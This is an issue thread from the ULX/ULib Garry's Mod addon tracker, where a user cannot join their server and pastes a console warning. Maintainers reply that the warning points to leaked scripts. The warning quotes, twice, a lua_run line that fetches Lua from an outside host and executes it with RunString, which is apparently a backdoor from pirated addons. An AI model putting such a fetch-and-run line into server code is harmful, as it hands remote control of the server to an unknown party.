### ISSUE TITLE
Cannot join server

### ISSUE THREAD

**Issue by SnappyCo** [TeamUlysses/ulx#71]
### Steps to reproduce
1. Install ULX and Ulib into your addon folder

### Expected behavior
The server runs perfectly

### Actual behavior
When I join the server the loading screen displays 'Authenticating with Steam...' and the console is spammed with 'Warning: Skipping command lua_run timer.Simple(120, function() http.Fetch("http://lifeplay.pl/tracker/scripts/autorun.lua", function(body) RunString(body) end, function() end) end)'
You cannot join.

### Error(s) in server console, if any
Warning: Skipping command lua_run timer.Simple(120, function() http.Fetch("http://lifeplay.pl/tracker/scripts/autorun.lua", function(body) RunString(body) end, function() end) end)

### Version
I cannot enter game, the files are called 'ulib-v2_61' and 'ulx-v3_71'

**Comment by Nayruden** [comment]
What does "lifeplay.pl" mean to you? That is nothing from ULX/ULib.

**Comment by SnappyCo** [comment]
This error occurs every time I install ulx.

**Comment by Nayruden** [comment]
That does not answer the question I asked.

**Comment by SnappyCo** [comment]
I don't know what it means, why else would I report this? I remove all my addons and the server runs fine but as soon as I put ulx and ulib into the addons folder this happens.

**Comment by Violat0r** [comment]
Do you have any addons that are modules for ulx? Something like addons/<addonname>/lua/ulx/modules/sh/<acustommodule>.lua

You might have another addon that uses ulx/ulib and is causing things to break is most likely the issue, not ulx itself. Check your lua/autorun as well as your addons folders.

**Comment by Nayruden** [comment]
That error suggests you are running leaked scripts. We cannot support pirated addons, even if they conflict with ULX/ULib.
